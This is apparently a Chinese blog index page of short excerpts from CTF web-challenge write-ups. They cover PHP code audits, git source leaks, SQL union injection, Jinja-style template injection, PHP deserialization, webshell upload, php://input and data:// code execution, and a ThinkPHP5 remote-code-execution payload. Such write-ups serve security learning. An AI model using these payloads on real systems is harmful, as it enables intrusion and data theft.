摘要: 1.审计代码,写出逆向加密算法 <?php $str='a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws'; $_ = base64_decode(strrev(str_rot13($str))); $_o=NULL; for( 阅读全文
posted @ 2020-03-12 23:42 joker0xxx3 阅读(343) 评论(0) 推荐(0) 编辑
摘要: 1.查看页面,发现网站使用的一些东西 2.存在.git目录 3.使用 GitHack获取源码 4.index.php中关键代码如下 <?php if (isset($_GET['page'])) { $page = $_GET['page'];} else { $page = "home";} $f 阅读全文
posted @ 2020-03-12 23:15 joker0xxx3 阅读(250) 评论(0) 推荐(0) 编辑
摘要: 1.发现robots.txt文件 2.存在git源码泄露,用GitHack扫描url 3.查看api.php的源码 4.其中 $numbers 来自用户json输入 {"action":"buy","numbers":"1122334"},没有检查数据类型。 $win_numbers 是随机生成的数 阅读全文
posted @ 2020-03-12 22:37 joker0xxx3 阅读(301) 评论(0) 推荐(0) 编辑
摘要: 1.发现此页面 2.发现sql注入不行,尝试爆破id值,用burpsuite的intruder模块,到id值为2333的时候暴出flag 阅读全文
posted @ 2020-03-12 21:56 joker0xxx3 阅读(212) 评论(0) 推荐(0) 编辑
摘要: 1.审计代码,构造payload,代码生成对象的序列化 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __des 阅读全文
posted @ 2020-03-12 19:15 joker0xxx3 阅读(464) 评论(0) 推荐(0) 编辑
摘要: 1.判断存在python模块注入 {{7+7}} 2.{{''.__class__.__mro__[2].__subclasses__()}} 3.{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].li 阅读全文
posted @ 2020-03-12 17:56 joker0xxx3 阅读(901) 评论(0) 推荐(0) 编辑
摘要: 1.前端检查文件类型,通过修改前端代码或者抓包改后缀,进行上传一句话木马 2.菜刀连接一句话,找到flag 阅读全文
posted @ 2020-03-12 17:26 joker0xxx3 阅读(459) 评论(0) 推荐(0) 编辑
摘要: 1.代码审计,需要构造序列化对象,o表示对象 a表示数组 s表示字符 i表示数字 其后数字表示个数,并且需要绕过__wakeup()函数,对象个数大于实际对象个数就会跳过wakeup ?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";} 2.也可以构造的序列化flag 阅读全文
posted @ 2020-03-12 17:05 joker0xxx3 阅读(183) 评论(0) 推荐(0) 编辑
摘要: 1.查看index.phps文件 2.构造get参数,当传入参数id时,浏览器在后面会对非ASCII码的字符进行一次urlencode,然后在这段代码中运行时,会自动进行一次urldecode,在urldecode()函数中,再一次进行一次解码 ?id=%2561dmin 阅读全文
posted @ 2020-03-12 16:32 joker0xxx3 阅读(145) 评论(0) 推荐(0) 编辑
摘要: 1.下载附件,查看源码,全是乱码 2.审计代码可以看到最开始的下划线“_”是一个变量,其内容是一个函数的代码,而最后又是一个eval(_),也就是执行这个函数了,把eval改为alert,让程序弹框,得到了源码的非乱码形式: 3.整理得到 4.满足if条件即可输出flag be0f233ac7be9 阅读全文
posted @ 2020-03-12 15:48 joker0xxx3 阅读(294) 评论(0) 推荐(0) 编辑
摘要: 1.单引号判断页面报错,加上注释符页面正常,判定sql注入接下来手工注入即可 2.用order by判断有三个字段数,爆出位置 -1' union select 1,2,3# 3.暴出表名 -1' union select 1,2,group_concat(table_name) from info 阅读全文
posted @ 2020-03-12 15:18 joker0xxx3 阅读(321) 评论(0) 推荐(0) 编辑
摘要: 1.f12查看源代码,有提示 2.审计代码 3.提到hint.php,查看页面 4.构造payload,四层目录 http://111.198.29.45:35206/source.php?file=hint.php?./../../../../ffffllllaaaagggg 阅读全文
posted @ 2020-03-12 15:05 joker0xxx3 阅读(957) 评论(0) 推荐(0) 编辑
摘要: 方法一: 1.尝试构造,index.php?page=PHP://input post:<?php system("ls");?> 2.得到 3.查看fl4gisisish3r3.php文件 方法二: Payload:index.php?page=data:text/plain,<?php syst 阅读全文
posted @ 2020-03-12 14:13 joker0xxx3 阅读(541) 评论(0) 推荐(0) 编辑
摘要: 1.thinkphp5 rce漏洞,构造payload, ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("ls");%27 阅读全文
posted @ 2020-03-12 13:47 joker0xxx3 阅读(2686) 评论(1) 推荐(0) 编辑
摘要: 1.查看robots.txt页面 2.查看fl0g.php页面 阅读全文
posted @ 2020-03-12 13:31 joker0xxx3 阅读(274) 评论(0) 推荐(0) 编辑
摘要: 1.查看index.php页面,发现302跳转 2.抓包,查看返回 阅读全文
posted @ 2020-03-12 13:25 joker0xxx3 阅读(805) 评论(0) 推荐(0) 编辑
摘要: 001:view_source 1.F12查看源代码即可 002:robots 1.查看robots.txt文件,发现f1ag_1s_h3re.php文件 2.查看f1ag_1s_h3re.php页面 003:backup 1.备份文件泄露,下载查看 2.得到flag 004:cookie 1.查看 阅读全文
posted @ 2020-03-12 13:23 joker0xxx3 阅读(466) 评论(0) 推荐(0) 编辑